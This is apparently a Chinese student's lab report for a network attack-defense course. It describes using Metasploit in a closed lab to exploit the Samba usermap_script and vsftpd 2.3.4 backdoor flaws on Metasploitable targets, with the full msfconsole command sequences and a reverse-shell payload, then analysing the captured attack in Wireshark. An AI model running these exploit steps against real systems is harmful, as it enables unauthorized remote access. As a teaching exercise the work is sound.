20231902 吴文亮2023-2024-2 《网络攻防实践》第7周作业

一、 实践内容

1.1 使用Metasploit进行Linux远程渗透攻击
任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：

• 启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；

• 使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；

• 选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；

• 设置渗透攻击参数（RHOST，LHOST，TARGET等）；

1.2 实践作业：攻防对抗实践
攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。

防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

二、实践过程

2.1 使用Metasploit进行Linux渗透攻击

攻击机kali ip地址192.168.200.6，靶机metasploit ip地址192.168.200.123
输入msfconsole，启动软件

使用指令search samb查找要使用的漏洞对应的模块

使用指令use exploit/mulit/samba/usermap_script设置目标漏洞
使用指令show payloads，查看有效载荷

设置攻击载荷为tcp的反向连接

使用指令set payload cmd/unix/reverse选择攻击载荷
使用命令show options查看需要配置的参数

查看靶机IP地址

使用命令set RHOST 192.168.200.123设置靶机地址

设置完成后，使用exploit进行攻击
并使用ifconfig进行验证

如上图可以看到已经成功获得靶机的访问权

2.2 攻防对抗实践

2.2.1 攻击机实验
攻击机：192.168.1.107（20231902吴文亮）
靶机：192.168.1.110（20231914严梓洋）
查看攻击机地址地址，靶机地址由对方告知

ping靶机，看看是否连通.如下图，ping通

使用漏洞代码 （vsftpd），扫描出 vsftpd 这种漏洞存在

使用下列代码进行攻击：
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set payload cmd/unix/interact
set rhost 192.168.1.110
set chost 192.168.1.107
exploit

由下图可知攻击成功

2.2.2靶机实验
作为靶机时需要进行抓包分析
攻击机：192.168.1.108（20231914严梓洋）
靶机：192.168.1.109（20231902吴文亮）
查看本机ip地址

使用wireshark抓包

查询数据流可知ftp的版本信息

继续查看数据流，可以看到攻击机获得了靶机地址

3 学习中遇到的问题

问题1：进行攻击时连接成功，没有显示
解决1：其实已经连接，只是没有回显。
问题2：攻防实践时，无法成功
解决2：注意指令是否输入正确。
4 学习感悟
通过本次对linux主机的渗透攻击，让我对渗透流程有了更进一步的掌握